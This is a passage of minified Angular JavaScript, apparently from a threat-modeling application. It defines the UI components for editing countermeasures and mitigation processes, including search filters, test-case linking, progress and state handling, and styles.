Me(B(3).OnUnlinkTestCase(r))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"remove"),u()(),s(12,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(3);Ct("highlight-light",i.selectedTestCase===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedTestCase===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(2),at("matTooltip",re(9,7,"general.Remove"))}}function E5e(t,a){if(1&t&&(m(0,"div",61),s(1,"\n        "),it(2,"app-test-case",62),s(3,"\n      "),u()),2&t){const e=B(3);C(2),V("testCase",e.selectedTestCase)}}function D5e(t,a){if(1&t){const e=Ye();m(0,"div",43),s(1,"\n    "),m(2,"div",44),s(3,"\n      "),m(4,"mat-list",45),s(5,"\n        "),m(6,"div",46),s(7),oe(8,"translate"),m(9,"button",47),oe(10,"translate"),m(11,"mat-icon"),s(12,"add"),u()(),s(13,"\n          "),m(14,"mat-menu",null,48),s(16,"\n            "),m(17,"input",49,50),he("ngModelChange",function(n){return be(e),Me(B(2).searchTCString=n)})("click",function(){return be(e),Me(B(2).OnSearchTCBoxClick())}),oe(19,"translate"),u(),s(20,"\n            "),ne(21,v5e,2,2,"button",51),s(22,"\n          "),u(),s(23,"\n          "),m(24,"mat-menu",null,52),s(26,"\n            "),ne(27,A5e,2,2,"button",51),s(28,"\n          "),u(),s(29,"\n        "),u(),s(30,"\n        "),ne(31,T5e,13,9,"mat-list-item",53),s(32,"\n      "),u(),s(33,"\n    "),u(),s(34,"\n    "),m(35,"div",54),s(36,"\n      "),ne(37,E5e,4,1,"div",55),s(38,"\n    "),u(),s(39,"\n  "),u()}if(2&t){const e=Ti(15),i=Ti(25),n=B(2);C(4),Ct("prop-list-light",!n.theme.IsDarkMode)("prop-list-dark",n.theme.IsDarkMode),C(3),ct("",re(8,14,"properties.LinkedTestCases")," \n          "),C(2),at("matTooltip",re(10,16,"general.Add")),V("matMenuTriggerFor",e),C(8),at("placeholder",re(19,18,"general.Search")),V("ngModel",n.searchTCString)("matMenuTriggerFor",i),C(4),V("ngForOf",n.GetTestCases()),C(6),V("ngForOf",n.GetFilteredTestCases()),C(4),V("ngForOf",n.countermeasure.GetTestCases()),C(6),V("ngIf",n.selectedTestCase)}}function x5e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",1),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",2,3),he("ngModelChange",function(n){return be(e),Me(B().countermeasure.Name=n)}),u(),s(10,"\n    "),ne(11,r5e,6,3,"button",4),s(12,"\n  "),u(),s(13,"\n  "),m(14,"mat-form-field",5),s(15,"\n    "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n    "),m(20,"input",6),he("ngModelChange",function(n){return be(e),Me(B().countermeasure.Number=n)}),u(),s(21,"\n    "),ne(22,s5e,3,3,"mat-hint",7),s(23,"\n  "),u(),s(24,"\n  "),it(25,"br"),s(26,"\n  "),m(27,"mat-form-field",8),s(28,"\n    "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n    "),m(33,"mat-select",9),he("valueChange",function(n){return be(e),Me(B().countermeasure.MitigationState=n)}),oe(34,"translate"),s(35,"\n      "),ne(36,c5e,3,4,"mat-option",10),s(37,"\n    "),u(),s(38,"\n  "),u(),s(39,"\n  "),ne(40,l5e,3,3,"mat-icon",11),s(41,"\n  "),m(42,"mat-form-field",12),s(43,"\n    "),m(44,"mat-label"),s(45),oe(46,"translate"),u(),s(47,"\n    "),m(48,"mat-select",13),he("valueChange",function(n){return be(e),Me(B().countermeasure.MitigationProcess=n)})("selectionChange",function(){return be(e),Me(B().mitigationProcessChange.emit())}),s(49,"\n      "),m(50,"input",14),he("keyup",function(n){return be(e),Me(B().OnSearchMitigationProcess(n))}),oe(51,"translate"),u(),s(52,"\n      "),m(53,"mat-option"),s(54),oe(55,"translate"),u(),s(56,"\n      "),ne(57,d5e,2,2,"mat-option",10),s(58,"\n    "),u(),s(59,"\n    "),m(60,"button",15),he("click",function(n){return be(e),B().EditMitigationProcess(),Me(n.stopPropagation())}),oe(61,"translate"),s(62,"\n      "),m(63,"mat-icon"),s(64,"edit"),u(),s(65,"\n    "),u(),s(66,"\n    "),m(67,"button",16),he("click",function(n){return be(e),B().AddMitigationProcess(),Me(n.stopPropagation())}),oe(68,"translate"),s(69,"\n      "),m(70,"mat-icon"),s(71,"add"),u(),s(72,"\n    "),u(),s(73,"\n  "),u(),s(74,"\n  "),it(75,"br"),s(76,"\n  "),ne(77,m5e,8,4,"mat-form-field",17),s(78,"\n  "),ne(79,h5e,15,9,"mat-form-field",18),s(80,"\n  "),m(81,"mat-form-field",19),s(82,"\n    "),m(83,"mat-label"),s(84),oe(85,"translate"),u(),s(86,"\n    "),it(87,"input",20),s(88,"\n  "),u(),s(89,"\n  "),it(90,"br"),s(91,"\n  "),m(92,"mat-form-field",8),s(93,"\n    "),m(94,"mat-label"),s(95),oe(96,"translate"),oe(97,"translate"),u(),s(98,"\n    "),m(99,"mat-select",21),he("valueChange",function(n){return be(e),Me(B().countermeasure.Control=n)}),s(100,"\n      "),m(101,"input",14),he("keyup",function(n){return be(e),Me(B().OnSearchControls(n))}),oe(102,"translate"),u(),s(103,"\n      "),m(104,"mat-option"),s(105),oe(106,"translate"),u(),s(107,"\n      "),ne(108,p5e,4,2,"mat-optgroup",22),s(109,"\n    "),u(),s(110,"\n    "),m(111,"button",16),he("click",function(n){return be(e),B().AddControl(),Me(n.stopPropagation())}),oe(112,"translate"),s(113,"\n      "),m(114,"mat-icon"),s(115,"add"),u(),s(116,"\n    "),u(),s(117,"\n  "),u(),s(118,"\n  "),m(119,"mat-form-field",23),s(120,"\n    "),m(121,"mat-label"),s(122),oe(123,"translate"),u(),s(124,"\n    "),m(125,"textarea",24),he("ngModelChange",function(n){return be(e),Me(B().countermeasure.Description=n)}),u(),s(126,"\n  "),u(),s(127,"\n  "),it(128,"app-tags",25),s(129,"\n  "),m(130,"mat-accordion",26),s(131,"\n    "),ne(132,g5e,17,4,"mat-expansion-panel",27),s(133,"\n    "),ne(134,y5e,17,4,"mat-expansion-panel",27),s(135,"\n    "),ne(136,M5e,17,4,"mat-expansion-panel",28),s(137,"\n  "),u(),s(138,"\n  "),it(139,"br"),s(140,"\n  "),ne(141,D5e,40,20,"div",29),s(142,"\n"),u()}if(2&t){const e=B();let i,n;Ct("disable",!e.canEdit),C(5),ke(re(6,47,"properties.Name")),C(3),at("matTooltip",e.countermeasure.Name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.countermeasure.Name),C(3),V("ngIf",e.countermeasure.Name),C(6),ke(re(18,49,"general.Number")),C(3),at("matTooltip",e.countermeasure.Number),V("ngModel",e.countermeasure.Number),C(2),V("ngIf",e.countermeasure.CheckUniqueNumber()),C(8),ke(re(31,51,"properties.Status")),C(3),at("matTooltip",re(34,53,e.GetMitigationStateName(e.countermeasure.MitigationState))),V("value",e.countermeasure.MitigationState),C(3),V("ngForOf",e.GetMitigationStates()),C(4),V("ngIf",!e.countermeasure.RuleStillApplies),C(5),ke(re(46,55,"properties.MitigationProcess")),C(3),at("matTooltip",null==e.countermeasure.MitigationProcess?null:e.countermeasure.MitigationProcess.Name),V("value",e.countermeasure.MitigationProcess),C(2),at("placeholder",re(51,57,"general.Search")),C(4),ct("",re(55,59,"properties.selectNone")," "),C(3),V("ngForOf",e.GetMitigationProcesses()),C(3),at("matTooltip",re(61,61,"general.Edit")),V("disabled",!e.countermeasure.MitigationProcess),C(7),at("matTooltip",re(68,63,"general.Add")),C(10),V("ngIf",!e.isManualEntry),C(2),V("ngIf",e.isManualEntry),C(5),ke(re(85,65,"general.Diagram")),C(3),at("matTooltip",null==(i=e.countermeasure.GetDiagram())?null:i.Name),V("spellcheck",e.dataService.HasSpellCheck)("value",null==(n=e.countermeasure.GetDiagram())?null:n.Name),C(8),za("",re(96,67,"general.Control")," (",re(97,69,"general.Informative"),")"),C(4),at("matTooltip",null==e.countermeasure.Control?null:e.countermeasure.Control.Name),V("value",e.countermeasure.Control),C(2),at("placeholder",re(102,71,"general.Search")),C(4),ke(re(106,73,"properties.selectNone")),C(3),V("ngForOf",e.GetControlGroups()),C(3),at("matTooltip",re(112,75,"general.Add")),C(11),ke(re(123,77,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.countermeasure.Description),C(3),V("tagableElement",e.countermeasure),C(4),V("ngIf",e.countermeasure.Control),C(2),V("ngIf",e.countermeasure.MitigationProcess),C(2),V("ngForOf",e.countermeasure.AttackScenarios),C(5),V("ngIf",e.dataService.Project.HasTesting)}}let cM=(()=>{class t{constructor(e,i,n,r,c,d,T){this.theme=c,this.dataService=d,this.dialog=T,this.searchCounter=0,this.canEdit=!0,this.isManualEntry=!1,this.elements=[],this.mitigationProcessChange=new Tt,this.searchTCString="",this.countermeasure=e,i&&(this.isManualEntry=i.Value),n&&(this.elements=n),r&&r.subscribe(k=>this.countermeasure=k)}get countermeasure(){return this._countermeasure}set countermeasure(e){this._countermeasure=e,this.controlGroups=this.mitigationProcesses=null}ngOnInit(){}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.nameBox&&this.nameBox.nativeElement.select())}GetControlGroups(){return null==this.controlGroups&&(this.controlGroups=[],this.dataService.Config.GetControlGroups().forEach(e=>{e.Controls.length>0&&this.controlGroups.push({name:e.Name,Controls:e.Controls})})),this.controlGroups}OnSearchControls(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.controlGroups=null,this.GetControlGroups();const i=e.target.value.toLowerCase(),n=this.countermeasure.Control;this.controlGroups.forEach(r=>{r.Controls=r.Controls.filter(c=>c==n||c.Name.toLowerCase().includes(i))}),this.controlGroups=this.controlGroups.filter(r=>r.Controls.length>0)}},250)}GetTargetsNames(){if(this.countermeasure.Targets)return this.countermeasure.Targets.map(e=>e.Name).join(", ")}AddControl(){let e=this.dataService.Config.CreateControl(this.dataService.Config.ControlLibrary);this.dialog.OpenAddControlDialog(e).subscribe(i=>{i?this.countermeasure.Control=e:this.dataService.Config.DeleteControl(e)})}AddMitigationProcess(){let e=this.dataService.Project.CreateMitigationProcess();this.countermeasure.MitigationProcess=e,this.dialog.OpenMitigationProcessDialog(e,!0).subscribe(i=>{i||this.dataService.Project.DeleteMitigationProcess(e)}),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},500)}EditMitigationProcess(){this.dialog.OpenMitigationProcessDialog(this.countermeasure.MitigationProcess,!1).subscribe(e=>{})}GetTestCases(){return this.dataService.Project.GetTesting().TestCases.filter(e=>!this.countermeasure.GetTestCases().includes(e))}GetFilteredTestCases(){return this.GetTestCases().filter(e=>e.Name.toLowerCase().includes(this.searchTCString.toLowerCase()))}OnLinkTestCase(e){e.AddLinkedCountermeasure(this.countermeasure),this.selectedTestCase=e}OnUnlinkTestCase(e){e.RemoveLinkedCountermeasure(this.countermeasure.ID),this.selectedTestCase==e&&(this.selectedTestCase=null)}OnSearchTCBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchTCBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}GetMitigationProcesses(){return null==this.mitigationProcesses&&(this.mitigationProcesses=this.dataService.Project.GetMitigationProcesses()),this.mitigationProcesses}OnSearchMitigationProcess(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.mitigationProcesses=null,this.GetMitigationProcesses();const i=e.target.value.toLowerCase(),n=this.countermeasure.MitigationProcess;this.mitigationProcesses=this.mitigationProcesses.filter(r=>n==r||r.Name.toLowerCase().includes(i))}},250)}GetMitigationStates(){return Sl.GetMitigationStates()}GetMitigationStateName(e){return Sl.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Jl,8),Ee(hf,8),Ee(Array,8),Ee(Tt,8),Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-countermeasure"]],viewQuery:function(e,i){if(1&e&&(Mi(n5e,5),Mi(o5e,5)),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first),Vt(n=Bt())&&(i.searchTCBox=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{countermeasure:"countermeasure",canEdit:"canEdit",isManualEntry:"isManualEntry",elements:"elements"},outputs:{mitigationProcessChange:"mitigationProcessChange"},decls:1,vars:1,consts:[[3,"disable",4,"ngIf"],["appearance","fill",2,"width","calc(100% - 85px)"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["color","warn","style","margin-left: 5px;",3,"matTooltip",4,"ngIf"],["appearance","fill",1,"property-form-field",2,"margin-left","10px"],["no-space","","matTooltipShowDelay","1000",3,"value","matTooltip","valueChange","selectionChange"],["mat-menu-item","",1,"searchBox",3,"placeholder","keyup"],["mat-icon-button","","matSuffix","","matTooltipShowDelay","1000",2,"width","25px",3,"disabled","matTooltip","click"],["mat-icon-button","","matSuffix","","matTooltipShowDelay","1000",2,"width","25px",3,"matTooltip","click"],["appearance","fill","class","disable","style","width: calc(100% - 300px - 15px);",4,"ngIf"],["appearance","fill","style","width: calc(100% - 300px - 15px);",4,"ngIf"],["appearance","fill",1,"property-form-field","disable",2,"margin-left","10px"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","value","matTooltip"],["no-space","","matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"label",4,"ngFor","ngForOf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"tagableElement"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],[4,"ngIf"],[4,"ngFor","ngForOf"],["class","row","style","margin-bottom: 10px;",4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"],[3,"value"],["color","warn",2,"margin-left","5px",3,"matTooltip"],["appearance","fill",1,"disable",2,"width","calc(100% - 300px - 15px)"],["matInput","",3,"value"],["appearance","fill",2,"width","calc(100% - 300px - 15px)"],["matTooltipShowDelay","1000","multiple","",3,"value","matTooltip","valueChange"],[3,"label"],["matExpansionPanelContent",""],[3,"canEdit","control"],[3,"canEdit","mitigationProcess"],[3,"canEdit","attackScenario"],[1,"row",2,"margin-bottom","10px"],[1,"column1"],[1,"prop-list","reorder-list"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addLinkedTCMenu","matMenu"],["mat-menu-item","",3,"ngModel","matMenuTriggerFor","placeholder","ngModelChange","click"],["searchTCBox",""],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngFor","ngForOf"],["filteredTCList","matMenu"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],[3,"testCase"]],template:function(e,i){1&e&&ne(0,x5e,143,79,"div",0),2&e&&V("ngIf",i.countermeasure)},styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}.searchBox[_ngcontent-%COMP%]{padding:0 16px;width:calc(100% - 32px);height:35px!important;line-height:35px!important;font-size:14px;font-weight:400}']}),t})();const w5e=["nameBox"];function I5e(t,a){if(1&t){const e=Ye();m(0,"button",24),he("click",function(){return be(e),Me(B(2).mitigationProcess.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function R5e(t,a){1&t&&(m(0,"mat-hint",25),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n      ",re(2,1,"messages.error.numberAlreadyExists"),"\n    "))}function S5e(t,a){if(1&t&&(m(0,"mat-option",26),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetMitigationProcessStateName(e)))}}function k5e(t,a){if(1&t&&(m(0,"mat-option",26),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e.Name)}}function P5e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-countermeasure",28),s(2,"\n      ")),2&t){const e=B().$implicit;C(1),V("countermeasure",e)}}function O5e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,P5e,3,1,"ng-template",27),s(16,"\n    "),u()),2&t){const e=a.$implicit;C(5),ct("\n          ",re(6,2,"general.CountermeasureInfo"),"\n        "),C(4),ct("\n          ",e.Name,"\n          ")}}function N5e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",1),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",2,3),he("ngModelChange",function(n){return be(e),Me(B().mitigationProcess.Name=n)}),u(),s(10,"\n    "),ne(11,I5e,6,3,"button",4),s(12,"\n  "),u(),s(13,"\n  "),m(14,"mat-form-field",5),s(15,"\n    "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n    "),m(20,"input",6),he("ngModelChange",function(n){return be(e),Me(B().mitigationProcess.Number=n)}),u(),s(21,"\n    "),ne(22,R5e,3,3,"mat-hint",7),s(23,"\n  "),u(),s(24,"\n  "),it(25,"br"),s(26,"\n  "),m(27,"mat-form-field",8),s(28,"\n    "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n    "),m(33,"mat-select",9),he("valueChange",function(n){return be(e),Me(B().mitigationProcess.MitigationProcessState=n)})("selectionChange",function(n){return be(e),Me(B().OnStateChange(n.value))}),oe(34,"translate"),s(35,"\n      "),ne(36,S5e,3,4,"mat-option",10),s(37,"\n    "),u(),s(38,"\n  "),u(),s(39,"\n  "),m(40,"mat-icon",11),oe(41,"translate"),s(42,"north_east"),u(),s(43,"\n  "),m(44,"mat-slider",12),he("ngModelChange",function(n){return be(e),Me(B().mitigationProcess.Progress=n)})("change",function(n){return be(e),Me(B().OnProgressChange(n.value))}),u(),s(45,"\n  "),m(46,"mat-form-field",13),s(47,"\n    "),m(48,"mat-label"),s(49),oe(50,"translate"),u(),s(51,"\n    "),m(52,"mat-select",14),he("valueChange",function(n){return be(e),Me(B().mitigationProcess.Countermeasures=n)})("selectionChange",function(){return be(e),Me(B().countermeasuresChange.emit())}),s(53,"\n      "),m(54,"input",15),he("keyup",function(n){return be(e),Me(B().OnSearchCountermeasure(n))}),oe(55,"translate"),u(),s(56,"\n      "),ne(57,k5e,2,2,"mat-option",10),s(58,"\n    "),u(),s(59,"\n  "),u(),s(60,"\n  "),m(61,"mat-form-field",13),s(62,"\n    "),m(63,"mat-label"),s(64),oe(65,"translate"),u(),s(66,"\n    "),m(67,"textarea",16),he("ngModelChange",function(n){return be(e),Me(B().mitigationProcess.Description=n)}),u(),s(68,"\n  "),u(),s(69,"\n  "),m(70,"div"),s(71,"\n    "),m(72,"h4"),s(73),oe(74,"translate"),m(75,"button",17),s(76,"\n        "),m(77,"mat-icon"),s(78,"more_vert"),u(),s(79,"\n      "),u(),s(80,"\n    "),u(),s(81,"\n    "),m(82,"mat-menu",null,18),s(84,"\n      "),m(85,"button",19),he("click",function(){return be(e),Me(B().AdoptFromMeasures())}),s(86,"\n        "),m(87,"span"),s(88),oe(89,"translate"),u(),s(90,"\n      "),u(),s(91,"\n    "),u(),s(92,"\n    "),it(93,"app-notes",20),s(94,"\n  "),u(),s(95,"\n  "),m(96,"div"),s(97,"\n    "),m(98,"h4"),s(99),oe(100,"translate"),u(),s(101,"\n    "),it(102,"app-notes",21),s(103,"\n  "),u(),s(104,"\n  "),m(105,"mat-accordion",22),s(106,"\n    "),ne(107,O5e,17,4,"mat-expansion-panel",23),s(108,"\n  "),u(),s(109,"\n  "),it(110,"br"),s(111,"\n"),u()}if(2&t){const e=Ti(83),i=B();Ct("disable",!i.canEdit),C(5),ke(re(6,39,"properties.Name")),C(3),at("matTooltip",i.mitigationProcess.Name),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.mitigationProcess.Name),C(3),V("ngIf",i.mitigationProcess.Name),C(6),ke(re(18,41,"general.Number")),C(3),at("matTooltip",i.mitigationProcess.Number),V("ngModel",i.mitigationProcess.Number),C(2),V("ngIf",i.mitigationProcess.CheckUniqueNumber()),C(8),ke(re(31,43,"properties.Status")),C(3),at("matTooltip",re(34,45,i.GetMitigationProcessStateName(i.mitigationProcess.MitigationProcessState))),V("value",i.mitigationProcess.MitigationProcessState),C(3),V("ngForOf",i.GetMitigationProcessStates()),C(4),at("matTooltip",re(41,47,"general.Progress")),C(4),V("displayWith",i.formatLabel)("ngModel",i.mitigationProcess.Progress),C(5),ke(re(50,49,"general.Countermeasures")),C(3),at("matTooltip",i.GetCountermeasuresName(i.mitigationProcess.Countermeasures)),V("value",i.mitigationProcess.Countermeasures),C(2),at("placeholder",re(55,51,"general.Search")),C(3),V("ngForOf",i.GetCountermeasures()),C(7),ke(re(65,53,"properties.Description")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.mitigationProcess.Description),C(6),ct("\n      ",re(74,55,"general.Tasks"),"\n      "),C(2),V("matMenuTriggerFor",e),C(13),ke(re(89,57,"pages.modeling.mitigationprocess.adoptMeasures")),C(5),V("showTimestamp",!1)("hasCheckbox",!0)("canToggleTimestamp",!0)("notes",i.mitigationProcess.Tasks),C(6),ke(re(100,59,"general.Notes")),C(3),V("showTimestamp",!0)("hasCheckbox",!1)("canToggleCheckbox",!0)("notes",i.mitigationProcess.Notes),C(5),V("ngForOf",i.mitigationProcess.Countermeasures)}}let _T=(()=>{class t{constructor(e,i,n,r){this.theme=i,this.dataService=n,this.dialog=r,this.searchCounter=0,this.isEdtingArray=[[],[]],this.canEdit=!0,this.countermeasuresChange=new Tt,this.mitigationProcess=e}get mitigationProcess(){return this._mitigationProcess}set mitigationProcess(e){this._mitigationProcess=e,this.countermeasures=null}ngOnInit(){}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.nameBox&&this.nameBox.nativeElement.select())}AdoptFromMeasures(){this.mitigationProcess.Countermeasures.forEach(e=>{this.mitigationProcess.Tasks.some(i=>i.Note==e.Name)||this.mitigationProcess.Tasks.push({Note:e.Name+" (CM"+e.Number.toString()+")",IsChecked:!1,Date:Date.now().toString(),Author:this.dataService.UserDisplayName,HasCheckbox:!0,ShowTimestamp:!1})})}OnStateChange(e){e==kl.WorkInProgress?(0==this.mitigationProcess.Progress&&(this.mitigationProcess.Progress=5),this.mitigationProcess.Countermeasures.forEach(i=>{[Ra.NotSet,Ra.Implemented].includes(i.MitigationState)&&(i.MitigationState=Ra.MitigationStarted)})):e==kl.Completed&&(this.mitigationProcess.Progress=100,this.mitigationProcess.Countermeasures.forEach(i=>{i.MitigationState==Ra.MitigationStarted&&(i.MitigationState=Ra.Implemented)}))}OnProgressChange(e){100==e?(this.mitigationProcess.MitigationProcessState=kl.Completed,this.mitigationProcess.Countermeasures.forEach(i=>{i.MitigationState==Ra.MitigationStarted&&(i.MitigationState=Ra.Implemented)})):e>0&&(this.mitigationProcess.MitigationProcessState=kl.WorkInProgress,this.mitigationProcess.Countermeasures.forEach(i=>{[Ra.NotSet,Ra.Implemented].includes(i.MitigationState)&&(i.MitigationState=Ra.MitigationStarted)}))}GetCountermeasures(){return null==this.countermeasures&&(this.countermeasures=this.dataService.Project.GetCountermeasures()),this.countermeasures}OnSearchCountermeasure(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.countermeasures=null,this.GetCountermeasures();const i=e.target.value.toLowerCase(),n=this.mitigationProcess.Countermeasures;this.countermeasures=this.countermeasures.filter(r=>n.includes(r)||r.Name.toLowerCase().includes(i))}},250)}GetCountermeasuresName(e){return null==e?void 0:e.map(i=>i.Name).join(", ")}formatLabel(e){return e.toFixed(0)+"%"}GetMitigationProcessStates(){return C2.GetMitigationStates()}GetMitigationProcessStateName(e){return C2.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Lp,8),Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-mitigation-process"]],viewQuery:function(e,i){if(1&e&&Mi(w5e,5),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{canEdit:"canEdit",mitigationProcess:"mitigationProcess"},outputs:{countermeasuresChange:"countermeasuresChange"},decls:1,vars:1,consts:[[3,"disable",4,"ngIf"],["appearance","fill",2,"width","calc(100% - 85px)"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange","selectionChange"],[3,"value",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",2,"margin-left","10px",3,"matTooltip"],["color","primary","thumbLabel","","tickInterval","5","step","5","min","0","max","100",2,"width","276px",3,"displayWith","ngModel","ngModelChange","change"],["appearance","fill",2,"width","100%"],["no-space","","multiple","","matTooltipShowDelay","1000",3,"value","matTooltip","valueChange","selectionChange"],["mat-menu-item","",1,"searchBox",3,"placeholder","keyup"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["mat-icon-button","",3,"matMenuTriggerFor"],["moreMenu","matMenu"],["mat-menu-item","",3,"click"],[3,"showTimestamp","hasCheckbox","canToggleTimestamp","notes"],[3,"showTimestamp","hasCheckbox","canToggleCheckbox","notes"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],[4,"ngFor","ngForOf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"],[3,"value"],["matExpansionPanelContent",""],[3,"countermeasure"]],template:function(e,i){1&e&&ne(0,N5e,112,61,"div",0),2&e&&V("ngIf",i.mitigationProcess)},styles:[".reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 